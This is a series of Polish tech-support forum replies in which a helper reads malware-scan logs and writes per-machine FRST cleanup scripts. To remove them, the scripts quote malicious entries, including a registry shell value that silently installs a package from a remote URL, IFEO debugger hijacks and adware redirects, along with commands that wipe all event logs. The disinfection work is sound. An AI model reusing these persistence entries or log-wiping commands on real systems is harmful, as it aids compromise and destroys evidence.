Miszel03

W raportach brak oznak infekcji - według mnie system jest czysty. Rozumiem, że aktualnie nie masz dostępu do konta? Powinna być dostępna opcja zweryfikowania tożsamości - podążaj za nią krok po kroku. Proszę przeprowadzić standardową procedurę zmiany hasła do serwisu Facebook oraz do skrzynki pocztowej, na którą zarejestrowane jest konto.

O, widzę, że założyłeś na różnych forach - KLIK. Przeczytaj mój post na tamtym forum.

Raporty OTL kasuję - to przestarzałe narzędzie diagnostyczne. Kasuję również log z ComboFix, który tutaj w ogóle nie będzie brany pod uwagę - jego używanie przez zwykłych użytkowników jest niebezpieczne - KLIK. Problem reklam, przekierowywań leży najprawdopodobniej w ustawieniu serwerów DNS z poziomu Windows - są zagraniczne, więc prawdopodobnie zainfekowane. Oprócz tego widoczny jest wpis w Harmonogramie zadań uruchamiający strony z reklamami, niechcianą treścią. Sprzątane będę również resztki po wcześniej odinstalowanym oprogramowaniu i usuwane polityki grup - prawdopodobne pozostałości po innych infekcjach. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia GroupPolicy: Ograniczenia - Windows Defender GroupPolicy\User: Ograniczenia Tcpip\..\Interfaces\{C795B877-EDBF-4CB6-86C7-98A7B9FA6ECC}: [NameServer] 35.177.46.238,178.132.6.57,46.101.28.31,82.202.226.203,193.238.153.54,10.0.0.1 HKU\S-1-5-21-2338321336-1237434166-982625386-1000\Software\Microsoft\Internet Explorer\Main,Start Page = S3 asmthub3; system32\DRIVERS\asmthub3.sys [X] S3 asmtxhci; system32\DRIVERS\asmtxhci.sys [X] S3 catchme; \??\C:\ComboFix\catchme.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] Task: {C4B52028-A78A-45FB-9B6F-768F3AE6D43E} - System32\Tasks\Scheduled Update S-1-8-22 => C:\Windows\explorer.exe hxxp://ifmaxi.ru C:\Users\AdamG\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk MSCONFIG\startupreg: Plumbytes Anti-Malware => "C:\Program Files\Plumbytes Software\Plumbytes Anti-Malware\Plumbytes.exe" /tray MSCONFIG\startupreg: MailRuUpdater => C:\Users\AdamG\AppData\Local\Mail.Ru\MailRuUpdater.exe C:\Users\AdamG\Desktop\osu!\repair osu!.lnk C:\Users\AdamG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PotPlayer\PotPlayer.lnk C:\Users\AdamG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PotPlayer\Uninstall PotPlayer.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\AdamG\AppData\Local\Mozilla C:\Users\AdamG\AppData\Roaming\Mozilla C:\Users\AdamG\AppData\Roaming\Profiles VirusTotal: C:\Windows\system32\drivers\FctdwR3QEejU.sys CMD: ipconfig /flushdns CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt 2. Ponów całościowy skan za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Nie, poproszę o nowe raporty. FRST to tylko narzędzie diagnostyczne. To kwalifikowany pomocnik musi w nich szukać nieprawidłowości.

Akcje pomyślnie wykonane (choć część musiała zostać wykonana wcześniej). System wygląda na czysty. Uznaję, że możemy kończyć. Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

W raportach brak oznak infekcji, za to są alerty dot. uszkodzeń. Drobną kosmetykę systemową pomijam, bo jest ona teraz całkowicie nie istotna. 1. Dostarcz przefiltrowany raport SFC z opcji sfc /scannow. 2. Dostarcz raport z Farbar Service Scanner.

W raportach brak oznak infekcji, wygląda na to, że coś przeszkodziło złośliwemu oprogramowaniu uruchomieniu się. Punkt pierwszym dotyczy kosmetyki systemowej (kasacja martwych wpisów / niepotrzebnych wyszukiwarek), zaś w drugim kompleksowy skan antywirusowy. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: SearchScopes: HKLM-x32 -> {572C8D28-EA28-4D24-8690-1945915742C5} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-3783304369-3441894555-728274890-1001 -> {572C8D28-EA28-4D24-8690-1945915742C5} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms} ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {15BECA27-1B89-4924-ADDD-5E74F3DC9E1F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {458CB686-5C70-4DC8-B1D6-283398D83E04} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {9AA37E06-3563-4DF9-AD9E-A7CCB315198F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {B7B6D046-08A3-41CC-8759-2F76383194E1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {DEDF8318-1E49-4767-AE49-EF4B09455B6E} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {E7F9402B-59E9-4854-BDAA-D2320D3E4C1C} - \WPD\SqmUpload_S-1-5-21-3783304369-3441894555-728274890-1001 -> Brak pliku C:\Users\Dominik\Desktop\MF Scan Utility.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Dostarcz plik Fixlog.

Akcja pomyślnie wykonana.

Dostarcz raporty z tych wszystkich programów. ComboFix to nieobliczalne narzędzie i trzeba stosować go tylko i wyłącznie w określonych sytuacjach pod okiem specjalisty - KLIK. Osobiście chyba przy leczeniu systemu nie zleciłem go nigdy, a przecież przetworzyłem setki tematów. W jaki sposób został pobrany FRST? Detekcja: C:\FRST\FRST.exe => Win32/Suweezy sugeruję jakieś niezgodności z tym związane. Jeśli zaś chodzi o raporty to plik Hosts ma szkodliwą zawartość, więc resetuje go. Sprzątam również resztki po oprogramowaniu z systemu. Dodatkowo resetuje gałąź dziennika zdarzeń by widzieć jak najświeższe błędy i wdrażam skanowanie integralności systemu. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: R3 catchme; \??\C:\Users\Adrian\AppData\Local\Temp\catchme.sys [X] U3 mbr; \??\C:\ComboFix\mbr.sys [X] Task: {FA0F307E-004F-4C12-B29A-CBFDB3972FC8} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software) C:\Users\Adrian\Desktop\Programy\Skype.lnk C:\Users\Adrian\Desktop\GRY\Life is Strange - Complete.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Square Enix\Life is Strange\Uninstall Life is Strange.lnk Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt 2. Dostarcz przefiltrowany raport SFC z opcji sfc /scannow. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Raporty nie wykazują oznak infekcji. Temat przenoszę do działu Windows 10, gdzie będzie prowadzona dalsza pomoc. W spoilerze zadaję działania poboczne, czystko kosmetyczne - raczej bez związku z problemem.

Pojawiły się jakieś problemy? W raportach nie widzę niczego niepokojącego. Są tylko resztki po wcześniej odinstalowanym oprogramowaniu itd.

Przepraszam, za późną odpowiedź - przeoczyłem temat. W dostarczonych raportach brak oznak infekcji. Temat przenoszę do działu Windows 7, gdzie będzie prowadzona dalsza pomoc, więc: 1. Dostarcz przefiltrowany raport z opcji sfc /scannow. 2. Dostarcz raport z CrystalDiskInfo w celu analizy dysku.

Nie wszystko poszło gładko, nadal mamy problem z fałszywymi przeglądarkami (źle podstawiłem ścieżki), ale zanim przejdziemy dalej to dlaczego poniższe dwie pozycje nie zostały odinstalowane? amuleC (było 5 pozycji - została jedna) CPU Miner (koparka BitCoin - chyba, że instalacja celowa to zignoruj) Rozumiem, że po prostu przeoczyłeś co jest jak najbardziej normalne przy takim natłoku działań. Powtórz akcje deinstalacyjne dla tych dwóch wyników. Reszta wygląda całkiem dobrze, będą jeszcze doczyszczenia, ale i też usuwanie fałszywych przeglądarek. Cieszę się, że Aero już działa. Zrób nowe raporty FRST. MBAM na razie w odstawkę - narobi bałaganu przetwarzając to metodą "na brutala" - w takich infekcjach trzeba korzystać tylko i wyłącznie z mechanizmu samych prawidłowych przeglądarek by uniknąć uszkodzeń.

Kolosalny bałagan i myślałem, że wyeliminowaliśmy już dawno te infekcje - ale taki stan systemu ma się u Ciebie od przeszło ponad roku (widzę po datach infekcji). Powinniśmy to zgrabnie zrobić, ale musisz się skupić i wykonywać instrukcje 1:1. Jeśli czegoś nie potrafisz wykonać - STOP. Zapytaj - na pewno rozszerzę instrukcje. Rozumiem, że DNS "Family Shield - tj. 208.67.222.123" blokujący treści dla dorosłych jest ustawieniem celowym? 1. Deinstalacje. Za pomocą Program Install and Uninstall Troubleshooter odinstaluj agresywne programy adware / PUP: AlphaGo (pięć pozycji do deinstalacji), amuleC (dwie pozycje do deinstalacji), amulesw (jedna pozycja do deinstalacji). Przez Panel Sterownia odinstaluj programy adware / PUP i koparkę BitCon: BikaQ Rss, BikaQ Rss Reader, WINSNARE, CPU Miner oraz sponsorów instalacyjnych / zbędne aplikacje: McAfee Security Scan Plus. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Cupduck C:\Users\Michał\AppData\Local\Cupduck C:\Users\Michal\AppData\Roaming\Cupduck C:\Program Files (x86)\Firefox C:\Users\Michał\AppData\Local\Firefox C:\Users\Michal\AppData\Roaming\Firefox Task: {014ED373-DBCE-4834-92A0-45678201ED76} - System32\Tasks\RobekBhangsKeypuncherV2 => rundll32.exe SeducibleMycelium.dll,main 7 1 Task: {1CE6248E-D2BD-4741-A30D-60FFC3207734} - \WordSurfer Auto Updater 1.10.0.19 Pending Update -> Brak pliku Task: {39B8185F-A4D4-4E7A-80C5-01E05DBC16E9} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe Task: {5B3448FD-225C-4B21-9B3A-8AFEB55977B0} - \Web Protector Plus -> Brak pliku Task: {856FC7A7-E566-4B19-BE6D-940E93667DE9} - System32\Tasks\d639866a9491f79c4d8ac0f8356e1d26 => rundll32.exe "C:\Program Files (x86)\globalUpdate\nmqype.dll",e62dc6c6547f46bda862da2d05af6862 Task: {AB83A9DF-E428-4EAA-862A-5A9395D9FF4B} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 Task: {CDD2DDB4-B89D-4857-A9BF-DDC42EFB8B18} - System32\Tasks\{C7FBCBF8-412A-4D95-8AAE-7F06CC8EC226} => "c:\program files (x86)\cupduck\application\chrome.exe" hxxps://ui.skype.com/ui/0/7.39.0.102/pl/abandoninstall?page=tsProgressBar Task: {D157AE0B-BE5F-4011-8F72-155A5042D3B3} - \WordWizard Auto Updater 1.10.0.24 Pending Update -> Brak pliku Task: {FDCC1C73-BCCB-4D26-9290-784F4057522E} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe [2017-01-18] () C:\windows\psgo C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\MIO C:\ProgramData\wintools C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d75398020044c136\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\70216a91c23d8320\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\1e9dbac0bb94874\Google Chrome.lnk ShortcutWithArgument: C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\FIFA 15.lnk -> C:\Program Files (x86)\GTX Box Team\FIFA 15\Launcher.exe () -> hxxp://www.amisites.com/?type=sc&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASGRAF\EuroTEST 2014 PWPW\Odinstaluj EuroTEST 2014 PWPW.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\4\Detect Tool.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\3\Game Manual.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\2\ReadMe.txt.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\1\Registration.lnk C:\Users\Robek\Desktop\MioMore Desktop 7.50.lnk C:\Users\Robek\Desktop\programy\Norton Internet Security.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mio\MioMore Desktop 7.50.lnk C:\Users\vod\Links\Downloads.lnk HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\Run: [background_fault] => C:\Users\Robek\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) C:\Users\Robek\AppData\Local\background_fault HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1SNkE3OWY3FkM4OWFxRWZQN8EdRWq5NjY8FkMcM8Y8RH== /q HKU\S-1-5-18\...\Run: [] => [X] IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Clfick\_ALLOWDEL_b314c\Gubed.exe -Yrrehs IFEO\taskmgr.exe: [Debugger] C:\Program Files (x86)\Clfick CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495819067&z=47dab1a86d2ac8b6587ff93gez9taw4b3g9t9e3m6o&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-09-22] FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\cfg [2015-09-22] CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.11.2.7\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.11.2.7\Exts\Chrome.crx S2 CSHMDR; C:\Users\Robek\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 glory; C:\Users\Robek\AppData\Local\glory\glory.dll [809984 2017-06-02] (glory) [brak podpisu cyfrowego] R2 MCRL; C:\ProgramData\Microsoft\VisualStudio\14.0\2052\msmg.dll [368128 2016-12-09] () [brak podpisu cyfrowego] S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5]S2 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /svc [X] S3 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /medsvc [X] S2 Zerdgeghevse; C:\Program Files (x86)\Clfick\pighzabodomCln.dll [X] C:\Users\Robek\AppData\Local\CSHMDR C:\Users\Robek\AppData\Local\glory C:\ProgramData\Microsoft\VisualStudio C:\Program Files (x86)\globalUpdate S3 cpuz134; \??\C:\Users\Robek\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X] U2 CWASRE; Brak ImagePath S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 NAVENG; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\VirusDefs\20150808.001\ENG64.SYS [X] S3 NAVEX15; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\VirusDefs\20150808.001\EX64.SYS [X] S1 p1481550202am; \??\C:\Users\Robek\AppData\Local\Temp\bkB5B8.tmp\p1481550202am.sys [X] S1 p1481732029am; \??\C:\Users\Robek\AppData\Local\Temp\bkFB11.tmp\p1481732029am.sys [X] U2 snare; Brak ImagePath S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] U2 WinSnare; Brak ImagePath 2017-11-21 17:32 - 2016-09-28 22:41 - 000001164 _____ C:\Users\Public\Documents\temp.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 007310848 _____ () C:\Users\Robek\AppData\Roaming\agent.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 000140288 _____ () C:\Users\Robek\AppData\Roaming\Installer.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 000018432 _____ () C:\Users\Robek\AppData\Roaming\Main.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 000683520 _____ () C:\Users\Robek\AppData\Roaming\VoyaTam.exe CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Robek\AppData\Local CMD: dir /a C:\Users\Robek\AppData\LocalLow CMD: dir /a C:\Users\Robek\AppData\Roaming Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\Themes /s File: C:\Users\Robek\Desktop\FIX.REG CMD: netsh advfirewall reset Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Po tej akcji zniknęły skróty przeglądarek - odtwórz je. Powinna już działać kompozycja Aero - sprawdź czy na pewno. 4. Wymagane jest podjęcie akcji naprawczych w profilach przeglądarek ze względu na ich infekcje. Uruchom przeglądarkę Google Chrome, a następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę, zaloguj się na profil Default, zamknij okno poprzedniego, wróć do ustawień i skasuj profil ChromeDefaultData. Po tej akcji trzeba odpiąć skróty Chrome z paska i przypiąć od nowa. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. Po tej akcji trzeba odpiąć skróty Mozilla FireFox z paska i przypiąć od nowa. Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki. Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). cupduck;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Używaj opcji Edytuj. kiedy zapomnisz dodać jakiś informacji. Zaraz ktoś przeniesie ten temat do działu Pomocy doraźnej ja tutaj nie mam dostępu moderacyjnego. Gotowe. System jest bardzo mocno zainfekowany - zmodyfikowana został również usługa kompozycje. Naprawa powinna pójść gładko i szybko, ale proszę najpierw o trzeci raport Shortcut generowany przez FRST - w instrukcjach jest jasno napisane, że jest wymagany.

Raporty, które są dostarczone są nieprzefiltrowane - wykonaj jeszcze raz skan SFC z opcji sfc /scannow i dostarcz przefiltrowany raport. Dodatkowo poproszę o raporty FRST. Pokaż mi również informacje z klucza Kompozycje: Uruchom SystemLook i w oknie programu wklej: :reg HKLM\SYSTEM\CurrentControlSet\Services\Themes /s Kliknij w Look, momentalnie pojawi się okienko z raportem, przekopiujesz wtedy jego treść i wkleisz na forum.

W pliku Hosts widać modyfikacje wprowadzone przez złośliwe oprogramowanie - RiskWare.DontStealOurSoftware (raczej bez związku z problemem). Oprócz tego odbędzie się również sprzątanie systemu z resztek, a następnie temat zostanie przeniesiony do działu Sieci, gdzie będzie prowadzona pomoc dotycząca tytułowego problemu. Na przyszłość: programy typu DLL-Fixer (widzę ich ślady w raportach) to niebezpieczne twory - pliki nie są nigdzie zweryfikowane i mogą nieść za sobą przykre konsekwencje. 1. Sugeruję odinstalować program z preaktywowanym modułem wyświetlającym reklamy po pewnym czasie: Ace Stream Media 3.1.11. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {0601453C-71F6-44E3-8ABD-CCD9F1F97003} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {53EC7382-8349-4510-8DB8-B091BA6C16A1} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {5D4475A5-CA1F-4554-BEC6-BFD5263AA87A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {68558A1D-7C33-4A4A-9B0F-3711ACDDFF5B} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {725EF1C9-888B-492C-B70F-D9FE39DF6B06} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {8D1F0180-37DD-4215-9D89-E0F876767C4C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {904E1DE2-5540-491F-BD2A-2370E083C967} - \CCleanerSkipUAC -> Brak pliku Task: {920CE90B-0997-4585-992E-967D7E69EA0E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {95E3575D-2FE9-43EF-8F3D-659CEC5F07FF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {BEAC0BB1-6CF7-4835-BA51-BDA155F04F0F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {E8F513D6-F6C4-49D9-8D94-09D2DBB453F1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {FB86C0C2-CF61-4CE8-96F8-25AD84A2E376} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku C:\Users\Gr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera Software\Opera.lnk BootExecute: autocheck autochk * SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1946104158-849987808-3721883152-1001 -> DefaultScope {5FD446F9-67A5-4242-B780-AA7660820338} URL = SearchScopes: HKU\S-1-5-21-1946104158-849987808-3721883152-1001 -> {5FD446F9-67A5-4242-B780-AA7660820338} URL = S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X] S3 esgiguard; 